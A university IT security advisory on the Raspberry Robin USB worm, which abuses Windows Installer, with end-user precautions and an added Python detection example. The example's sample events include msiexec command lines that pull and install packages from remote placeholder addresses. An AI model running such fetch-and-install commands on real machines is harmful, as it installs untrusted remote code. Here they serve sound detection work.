USB-Based Wormable Malware Targets Windows Installer

Source: Threat Post

Background

A USB-initiated cyber-attack refers to threat actors using a USB drive to spread malware. In a targeted attack, infected USB drives are deliberately dropped in public locations, such as parking lots or cafes, to entice victims into picking one up and opening it on their own computers. In the most basic USB drop attack, the user clicks on one of the files on the drive. This unleashes malicious code that activates automatically upon viewing and can download further malware from the Internet.

Thumb drives are used pretty much everywhere nowadays. Whether a generic metallic memory stick, a branded giveaway at an event, or cleverly disguised as a pop culture icon, these devices are universally embraced as an easy way to transfer data.  Unfortunately, they’re also loved by cybercriminals, who can use thumb drives to attack your computer.

Once the drive is plugged in, the trouble begins.

The current threat

Malware dubbed Raspberry Robin has been active since last September and is finding its way onto Windows machines via USB drives, where it uses Microsoft Standard Installer and other legitimate processes to install malicious files. Researchers at Red Canary Intelligence first began tracking the activity as a handful of detections with similar characteristics observed in multiple customers’ environments.

Once the malicious code, or worm, spreads via a USB drive to someone’s machine, it relies on standard Microsoft code to call out to its infrastructure. Eventually the worm installs malicious files located on the infected USB drive.
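The defensive angle on the behaviour just described is to watch for Windows Installer (msiexec.exe) being used to pull a package from the network. The example below is added here and is not code from Threat Post, Red Canary or UNE; it runs a simple check over constructed process-creation records and assumes the installer is invoked with an http/https source on its command line and that the allowlisted deployment host is a placeholder for your own.

```python
import ntpath
import re
from urllib.parse import urlsplit

# Assumption: only these hosts are legitimate package sources for deployment
# tooling in this environment. Placeholder value, replace with your own.
ALLOWED_HOSTS = {"updates.example.com"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (Sysmon Event ID 1 style), not real telemetry.
# Addresses are from the RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": 'msiexec /q /i "http://203.0.113.7:8080/pkg.msi"'},
    {"pid": 4125, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\alice\Downloads\7zip.msi"'},
    {"pid": 4129, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /qn /i https://updates.example.com/agent.msi"},
    {"pid": 4133, "image": r"C:\WINDOWS\SYSWOW64\MSIEXEC.EXE",
     "cmdline": "MSIEXEC.EXE /Q /I HTTP://198.51.100.9/a.msi"},
    {"pid": 4140, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe http://203.0.113.7/"},
]

def is_msiexec(image: str) -> bool:
    """True when the process image is Windows Installer, whatever the path case."""
    return ntpath.basename(image).lower() == "msiexec.exe"

def remote_sources(cmdline: str) -> list[str]:
    """Hosts of every http/https URL on the command line (empty for local paths)."""
    return [urlsplit(m).hostname or "" for m in URL_RE.findall(cmdline)]

def find_remote_msiexec(events):
    """Flag msiexec launches that fetch a package from a host outside the allowlist."""
    hits = []
    for ev in events:
        if not is_msiexec(ev["image"]):
            continue
        bad = [h for h in remote_sources(ev["cmdline"]) if h.lower() not in ALLOWED_HOSTS]
        if bad:
            hits.append({"pid": ev["pid"], "hosts": bad, "cmdline": ev["cmdline"]})
    return hits

if __name__ == "__main__":
    for hit in find_remote_msiexec(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: msiexec pulling from {hit['hosts']}")
```

Legitimate software deployment also drives msiexec from a URL, so the allowlist is what keeps this usable; tune it to your packaging servers before alerting on it.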

Unanswered Questions

Though researchers observed various processes and executions by the malicious activity, they acknowledged that these observations have left a number of unanswered questions.

The team has not yet figured out how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this infection occurs offline or “otherwise outside of our visibility,” researchers said.

They also don’t know why Raspberry Robin installs a malicious DLL, although they believe it may be an attempt to establish persistence on an infected system, though there is not enough evidence to make this conclusive, researchers acknowledged.

However, the biggest question mark surrounding the worm is the objective of the threat actors behind it, researchers said.

“Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” they acknowledged.

What you need to do

This way of introducing malware has been known for some time; however, this new variant of the attack makes use of standard Microsoft processes. Whilst it has been found on USB drives to date, it follows that the attackers are developing other ways to introduce malicious code using standard software update processes.

As an end user, please follow these simple cyber security procedures:

  • Do not insert USB thumb drives from unknown sources into your PC. This includes those handed out at trade shows;
  • Only install software updates from known sources – such as UNE software centre or verified vendor sites;
  • Report any unusual activity to the Service Desk – 02 6773 5000.

If you haven’t already, we would encourage you to visit the UNE Cybersecurity page and undertake the UNE Mandatory Security Awareness Training.

Thanks for your support in helping us maintain the cyber security integrity of UNE.